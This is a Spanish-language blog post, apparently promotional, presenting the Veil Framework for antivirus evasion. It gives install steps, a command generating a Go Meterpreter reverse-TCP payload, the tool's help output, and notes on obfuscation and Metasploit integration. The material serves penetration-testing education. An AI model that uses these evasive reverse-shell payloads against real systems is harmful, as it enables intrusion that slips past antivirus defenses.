AV Bypass con Veil – ¡Bienvenidos! – Hoy nos embarcamos en un viaje fascinante a través del mundo de Veil Framework, una herramienta imprescindible en el arsenal de cualquier profesional de la seguridad informática. A lo largo de este post, descubriremos qué hace que Veil sea una herramienta tan valiosa, cómo instalarla y configurarla, y exploraremos sus características y funcionalidades clave. Profundizaremos en los detalles técnicos, desde la creación y uso de payloads hasta las técnicas de evasión avanzadas, todo ello con la guía experta de los recursos disponibles en el repositorio de GitHub de Veil. Así que, prepárense para sumergirse en el fascinante mundo de Veil Framework y aprender cómo esta herramienta puede elevar sus habilidades de pentesting al siguiente nivel.
¿Qué es Veil Framework?
Veil Framework es una herramienta diseñada para generar payloads de Metasploit que permiten hacer AV Bypass a soluciones comunes de antivirus. Su desarrollo y soporte actual están a cargo de @ChrisTruncer. Este framework es clave para pentesters que buscan mejorar sus técnicas de evasión y ofuscación.
Instalación y Configuración Básica
Pueden instalar Veil Framework en una variedad de sistemas operativos Linux, incluyendo Debian, Kali Linux, Arch Linux, Fedora y más. Para una instalación rápida en Kali Linux:
apt -y install veil
/usr/share/veil/config/setup.sh --force --silent
Para una instalación general utilizando Git:
sudo apt-get -y install git
git clone https://github.com/Veil-Framework/Veil.git
cd Veil/
./config/setup.sh --force --silent
Recuerden ejecutar estos comandos con privilegios de superusuario y asegurarse de tener un servidor X en ejecución.
Explorando la Interfaz y Características Principales
Una vez instalado, ejecuten ./Veil.py
para acceder a la interfaz CLI de Veil. Encontrarán una variedad de herramientas y comandos para la generación y configuración de payloads. El menú principal muestra las herramientas disponibles y comandos como info
, list
, options
, y update
.
Creación y Uso de Payloads
Para generar un payload, seleccionen el tipo de payload deseado y configuren las opciones de conexión. Por ejemplo:
./Veil.py -t Evasion -p go/meterpreter/rev_tcp.py --ip 127.0.0.1 --port 4444
Esto generará un payload Meterpreter reverso en Go, que se conectará al IP y puerto especificados.
Opciones y Parámetros Disponibles
Veil Framework ofrece opciones detalladas para configurar sus payloads, incluyendo ajustes de IP y puerto para conexiones de retorno, selección de payload, y opciones personalizadas del módulo. Utilicen ./Veil.py --help
para ver una lista completa de opciones y parámetros.
$ ./Veil.py --help
usage: Veil.py [--list-tools] [-t TOOL] [--update] [--setup] [--config]
[--version] [--ip IP] [--port PORT] [--list-payloads]
[-p [PAYLOAD]] [-o OUTPUT-NAME]
[-c [OPTION=value [OPTION=value ...]]]
[--msfoptions [OPTION=value [OPTION=value ...]]] [--msfvenom ]
[--compiler pyinstaller] [--clean] [--ordnance-payload PAYLOAD]
[--list-encoders] [-e ENCODER] [-b \x00\x0a..] [--print-stats]
Veil is a framework containing multiple tools.
[*] Veil Options:
--list-tools List Veil's tools
-t TOOL, --tool TOOL Specify Veil tool to use (Evasion, Ordnance etc.)
--update Update the Veil framework
--setup Run the Veil framework setup file & regenerate the
configuration
--config Regenerate the Veil framework configuration file
--version Displays version and quits
[*] Callback Settings:
--ip IP, --domain IP IP address to connect back to
--port PORT Port number to connect to
[*] Payload Settings:
--list-payloads Lists all available payloads for that tool
[*] Veil-Evasion Options:
-p [PAYLOAD] Payload to generate
-o OUTPUT-NAME Output file base name for source and compiled binaries
-c [OPTION=value [OPTION=value ...]]
Custom payload module options
--msfoptions [OPTION=value [OPTION=value ...]]
Options for the specified metasploit payload
--msfvenom [] Metasploit shellcode to generate (e.g.
windows/meterpreter/reverse_tcp etc.)
--compiler pyinstaller
Compiler option for payload (currently only needed for
Python)
--clean Clean out payload folders
[*] Veil-Ordnance Shellcode Options:
--ordnance-payload PAYLOAD
Payload type (bind_tcp, rev_tcp, etc.)
[*] Veil-Ordnance Encoder Options:
--list-encoders Lists all available encoders
-e ENCODER, --encoder ENCODER
Name of shellcode encoder to use
-b \x00\x0a.., --bad-chars \x00\x0a..
Bad characters to avoid
--print-stats Print information about the encoded shellcode
$
PoC – Generando un Payload con Reverse Shell
Técnicas de Evasión y su Aplicación
Veil sobresale en técnicas de evasión, utilizando métodos como Py2Exe para reducir la tasa de detección. La documentación del repositorio de GitHub incluye guías sobre la instalación y uso de Py2Exe, además de otras técnicas de ofuscación.
Integración con Herramientas de Pentesting
Veil se integra perfectamente con otras herramientas de pentesting, especialmente Metasploit. Pueden usar los payloads generados con Veil en conjunto con Metasploit para crear ataques efectivos y poco detectables.
Mejores Prácticas y Consejos de Seguridad
Al utilizar Veil Framework, es crucial hacerlo de manera ética y responsable. Siempre obtengan permiso antes de realizar pruebas de penetración y manténganse al día con las últimas actualizaciones y técnicas de evasión a través del repositorio de GitHub de Veil.
Conclusión:
Veil Framework es una herramienta invaluable en el mundo del pentesting. Les invito a explorar a fondo el repositorio de GitHub de Veil para descubrir todo su potencial.
🔒 Hardsoft Security ofrece servicios de consultoría en ciberseguridad, asegurando que tu negocio esté siempre protegido contra las amenazas más recientes. Y si estás buscando un alojamiento que ponga la seguridad primero, Secure Hosting es tu solución ideal. Ayudamos a mantener seguro tu sitio web con las mejores prácicas de ciberseguridad con nuestro asesoramiento en ciberseguridad especializado.
No esperes a ser el próximo objetivo. Asegura tu presencia online con las mejores soluciones y servicios del mercado. ¡Contacta con Hardsoft Security y Secure Hosting hoy mismo!